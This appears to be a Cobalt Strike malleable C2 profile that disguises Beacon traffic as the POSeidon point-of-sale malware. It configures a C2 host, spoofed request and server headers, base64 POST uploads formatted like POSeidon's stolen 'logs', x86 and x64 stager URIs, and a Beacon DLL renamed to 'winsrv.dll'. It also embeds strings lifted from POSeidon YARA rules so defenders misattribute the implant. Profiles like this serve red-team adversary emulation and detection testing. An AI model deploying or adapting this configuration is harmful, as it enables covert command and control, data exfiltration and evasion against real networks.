155 lines
3.2 KiB
Plaintext
155 lines
3.2 KiB
Plaintext
#POSeidon
|
|
#taken from --> https://vallejo.cc/2017/07/12/analysis-of-poseidon-downloader-and-keylogger/
|
|
#xx0hcd
|
|
|
|
|
|
set sleeptime "30000";
|
|
set jitter "20";
|
|
set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; Media Center PC 6.0)";
|
|
set dns_idle "8.8.8.8";
|
|
set maxdns "235";
|
|
|
|
|
|
http-get {
|
|
|
|
set uri "/Baked/viewtopic.php";
|
|
|
|
client {
|
|
|
|
header "Accept" "*/*";
|
|
header "Content-Type" "application/x-www-form-urlencoded";
|
|
header "Host" "retjohnuithun.com";
|
|
header "Cache-Control" "no-cache";
|
|
|
|
metadata {
|
|
netbios;
|
|
prepend "PHPSESSID=";
|
|
header "Cookie";
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
server {
|
|
|
|
header "Server" "nginx/1.10.2";
|
|
header "Content-Type" "text/html";
|
|
header "Connection" "keep-alive";
|
|
header "X-Powered-By" "PHP/5.4.38";
|
|
|
|
|
|
output {
|
|
netbios;
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
http-post {
|
|
|
|
set uri "/baked/viewtopic.php";
|
|
|
|
client {
|
|
|
|
header "Accept" "*/*";
|
|
header "Content-Type" "application/x-www-form-urlencoded";
|
|
header "Host" "retjohnuithun.com";
|
|
# header "Cache-Control" "no-cache";
|
|
|
|
output {
|
|
base64;
|
|
prepend "logs=";
|
|
prepend "vers=13.4&";
|
|
prepend "win=6&";
|
|
prepend "uinfo=dWluZm8=&";
|
|
prepend "uid=692207&";
|
|
prepend "oprat=2&";
|
|
print;
|
|
|
|
}
|
|
|
|
|
|
id {
|
|
base64url;
|
|
# prepend "PHPSESSID=";
|
|
header "Cookie";
|
|
|
|
}
|
|
}
|
|
|
|
server {
|
|
|
|
header "Server" "nginx/1.10.2";
|
|
header "Content-Type" "text/html";
|
|
header "Connection" "keep-alive";
|
|
header "X-Powered-By" "PHP/5.4.38";
|
|
|
|
|
|
output {
|
|
netbios;
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
http-stager {
|
|
|
|
set uri_x86 "/ldl01/viewtopic.php";
|
|
set uri_x64 "/Ldl01/viewtopic.php";
|
|
|
|
client {
|
|
header "Accept" "*/*";
|
|
header "Content-Type" "application/x-www-form-urlencoded";
|
|
header "Host" "retjohnuithun.com";
|
|
header "Cache-Control" "no-cache";
|
|
}
|
|
|
|
server {
|
|
header "Server" "nginx/1.10.2";
|
|
header "Content-Type" "text/html";
|
|
header "Connection" "keep-alive";
|
|
header "X-Powered-By" "PHP/5.4.38";
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
stage {
|
|
#random
|
|
set compile_time "15 Nov 2017 12:24:14";
|
|
set image_size_x86 "301000";
|
|
|
|
transform-x86 {
|
|
strrep "beacon.dll" "winsrv.dll";
|
|
}
|
|
|
|
transform-x64 {
|
|
strrep "beacon.x64.dll" "winsrv.dll";
|
|
}
|
|
|
|
#yara rules from --> http://vkremez.weebly.com/cyber-intel/january-18th-2016
|
|
stringw "timed out";
|
|
stringw "AR6002";
|
|
stringw " delete[]";
|
|
stringw "horticartf.com";
|
|
stringw "CreateSemaphoreExW";
|
|
stringw "sma-se";
|
|
stringw "smj-NO";
|
|
stringw "IsValidLocaleName";
|
|
stringw "oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s";
|
|
stringw "bad exception";
|
|
stringw "_nextafter";
|
|
stringw "omni callsig'";
|
|
stringw "6d6h6l6p6t6x6";
|
|
stringw "DOMAIN error";
|
|
stringw "vector copy constructor iterator'";
|
|
stringw "- inconsistent onexit begin-end variables";
|
|
stringw "Monday";
|
|
stringw "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) x";
|
|
stringw "horticartf.com";
|
|
|
|
}
|